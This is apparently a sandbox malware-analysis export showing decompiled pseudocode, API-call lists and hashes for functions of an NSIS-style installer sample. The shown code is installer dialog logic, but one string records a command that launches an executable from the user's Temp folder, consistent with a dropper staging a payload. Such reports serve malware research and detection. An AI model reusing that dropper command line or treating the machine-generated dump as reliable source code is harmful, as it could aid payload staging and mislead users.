Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
Opcode Fuzzy Hash: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406507();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
Opcode Fuzzy Hash: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a248;
				_v28 =  *0x42a230 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a239 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E1E(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x4236ec;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423700;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x4236ec = 0;
								 *0x423700 = 0;
								 *0x42a280 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404E9E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423700;
									_t201 =  *0x42a248;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a24c <= 0) {
										L86:
										if( *0x42a2de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a24c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423700);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a280 = _t291;
					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
					_t297 = _t258;
					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236ec = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404463(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404463(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423700 + _t300 * 4) = _t284;
									_v16 =  *( *0x423700 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a24c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404498(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404498(_v12);
								L93:
								return E004044CA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404ed7
0x00404ef0
0x00404ef5
0x00404efd
0x00404f03
0x00404f19
0x00404f1c
0x00405147
0x0040514e
0x00405162
0x00405150
0x00405152
0x00405155
0x00405156
0x0040515d
0x0040515d
0x0040516e
0x0040517c
0x0040517f
0x00405195
0x0040520a
0x0040520d
0x0040520f
0x00405219
0x00405227
0x00405227
0x00405229
0x00405233
0x00405239
0x0040523c
0x0040523f
0x0040525a
0x00405241
0x0040524b
0x0040524b
0x0040523f
0x00405233
0x00000000
0x0040520d
0x0040519a
0x004051a5
0x004051aa
0x004051b1
0x004051b6
0x004051ba
0x004051c5
0x004051c5
0x004051c9
0x004051cd
0x004051d1
0x004051e4
0x004051d3
0x004051d3
0x004051da
0x004051e0
0x004051dc
0x004051dc
0x004051dc
0x004051da
0x004051e8
0x004051ea
0x004051fd
0x00405200
0x00405203
0x00405203
0x004051cd
0x00000000
0x004051ba
0x0040519c
0x004051a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040525d
0x0040525d
0x00405264
0x004052d5
0x004052dd
0x004052e5
0x004052e5
0x004052ee
0x004052f0
0x004052f7
0x004052fa
0x004052fa
0x00405300
0x00405307
0x0040530a
0x0040530a
0x00405310
0x00405316
0x0040531c
0x0040531c
0x00405329
0x0040548a
0x00405491
0x004054ae
0x004054b4
0x004054c6
0x004054c6
0x00000000
0x0040532f
0x00405331
0x00405336
0x0040533b
0x00405340
0x00405342
0x00405342
0x00405343
0x00405344
0x00405346
0x00405346
0x0040534e
0x0040538f
0x00405391
0x004053a1
0x004053a4
0x004053a9
0x004053b0
0x004053b3
0x00405455
0x0040545e
0x00405466
0x00405466
0x00405474
0x00405485
0x00405485
0x00000000
0x00405474
0x004053b9
0x004053bc
0x004053c2
0x004053c7
0x004053c9
0x004053cb
0x004053d1
0x004053d8
0x004053dd
0x004053e4
0x004053e7
0x004053e7
0x004053ee
0x004053fa
0x004053fe
0x00405400
0x00405400
0x004053f0
0x004053f2
0x004053f2
0x00405420
0x0040542c
0x0040543b
0x0040543b
0x0040543d
0x00405440
0x00405449
0x00000000
0x00405350
0x0040535b
0x0040535e
0x00405363
0x00405365
0x00405369
0x00405379
0x00405383
0x00405385
0x00405388
0x00000000
0x00000000
0x00000000
0x00000000
0x0040536b
0x0040536b
0x00405371
0x00405373
0x00405373
0x00405374
0x00405375
0x00000000
0x0040536b
0x0040534e
0x00405329
0x0040526c
0x00000000
0x00405282
0x0040528c
0x00405291
0x00000000
0x00000000
0x004052a3
0x004052a8
0x004052b4
0x004052b4
0x004052b6
0x004052c5
0x004052c7
0x004052cb
0x004052ce
0x00000000
0x004052ce
0x0040526c
0x00404f22
0x00404f27
0x00404f30
0x00404f37
0x00404f49
0x00404f54
0x00404f5a
0x00404f68
0x00404f7c
0x00404f81
0x00404f8e
0x00404f93
0x00404fa9
0x00404fba
0x00404fc7
0x00404fc7
0x00404fca
0x00404fd0
0x00404fd2
0x00404fd5
0x00404fda
0x00404fdf
0x00404fe1
0x00404fe1
0x00405001
0x00405001
0x00405003
0x00405004
0x00405009
0x0040500f
0x00405013
0x00405018
0x00405020
0x00405024
0x00405029
0x0040502e
0x00405036
0x00405039
0x00405109
0x0040511c
0x00000000
0x0040503f
0x00405042
0x00405045
0x00405048
0x00405048
0x0040504e
0x00405057
0x0040505a
0x0040505e
0x00405061
0x00405064
0x0040506d
0x00405076
0x00405079
0x0040507c
0x0040507f
0x004050bd
0x004050e8
0x004050bf
0x004050ce
0x004050ce
0x00405081
0x00405084
0x00405092
0x0040509c
0x004050a4
0x004050ab
0x004050b6
0x004050b6
0x0040507f
0x004050ee
0x004050ef
0x004050fb
0x004050fb
0x00405107
0x00405122
0x00405125
0x00405142
0x00000000
0x00405127
0x0040512c
0x00405135
0x004054c8
0x004054da
0x004054da
0x00405125
0x00000000
0x00405107
0x00405039

APIs

GetDlgItem.USER32 ref: 00404EE8
GetDlgItem.USER32 ref: 00404EF3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
LoadImageW.USER32 ref: 00404F54
SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
DeleteObject.GDI32(00000000), ref: 00404FCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
GetWindowLongW.USER32(?,000000F0), ref: 0040510E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
ShowWindow.USER32(?,00000005), ref: 0040512C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
ImageList_Destroy.COMCTL32(?), ref: 004052FA
GlobalFree.KERNEL32 ref: 0040530A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
ShowWindow.USER32(?,00000000), ref: 004054B4
GetDlgItem.USER32 ref: 004054BF
ShowWindow.USER32(00000000), ref: 004054C6

Strings

, xrefs: 0040549E
N, xrefs: 00405165
M, xrefs: 00405084

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216d4 =  *0x4216d4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044CA(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281c0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004048D1(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a228, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a228, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
						goto L27;
					} else {
						_t116 =  *0x4226e0 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048AD();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004045D3;
				if(_t110 != 2) {
					_v8 = E00404599;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404463(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404463(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404498(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a230 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216d4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216d4 = 0;
				return 0;
			}

0x00404634
0x00404761
0x004047be
0x004047c2
0x0040488f
0x00404891
0x00404891
0x00404897
0x00404897
0x0040489a
0x00000000
0x004048a1
0x004047d0
0x004047d6
0x004047e0
0x004047eb
0x004047ee
0x004047f1
0x004047fc
0x004047ff
0x00404806
0x00404813
0x00404824
0x0040482a
0x00404832
0x00404840
0x00404846
0x00404846
0x00404806
0x00404850
0x00000000
0x0040485b
0x0040485f
0x0040486f
0x0040486f
0x00404875
0x00404881
0x00404881
0x00000000
0x00404885
0x00404850
0x0040476c
0x00000000
0x0040477e
0x00404783
0x00404789
0x00000000
0x00000000
0x004047b2
0x004047b4
0x004047b9
0x00000000
0x004047b9
0x0040476c
0x0040463a
0x0040463d
0x00404642
0x00404653
0x00404653
0x0040465b
0x0040465e
0x00404662
0x00404665
0x00404669
0x0040466c
0x0040466f
0x00404672
0x00404679
0x0040467b
0x0040467b
0x00404685
0x00404692
0x0040469c
0x004046a1
0x004046a4
0x004046a9
0x004046c0
0x004046c7
0x004046da
0x004046dd
0x004046f1
0x004046f8
0x004046fd
0x00404702
0x00404702
0x00404710
0x0040471e
0x00404730
0x00404735
0x00404745
0x00404747
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
GetDlgItem.USER32 ref: 004046D4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
GetSysColor.USER32(?), ref: 00404702
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
lstrlenW.KERNEL32(?), ref: 00404723
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
GetDlgItem.USER32 ref: 0040479E
SendMessageW.USER32(00000000), ref: 004047A5
GetDlgItem.USER32 ref: 004047D0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
LoadCursorW.USER32(00000000,00007F02), ref: 00404821
SetCursor.USER32(00000000), ref: 00404824
LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
SetCursor.USER32(00000000), ref: 00404840
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881

Strings

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny, xrefs: 004047FF
N, xrefs: 004047BE

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny$N
API String ID: 3103080414-4273014226
Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
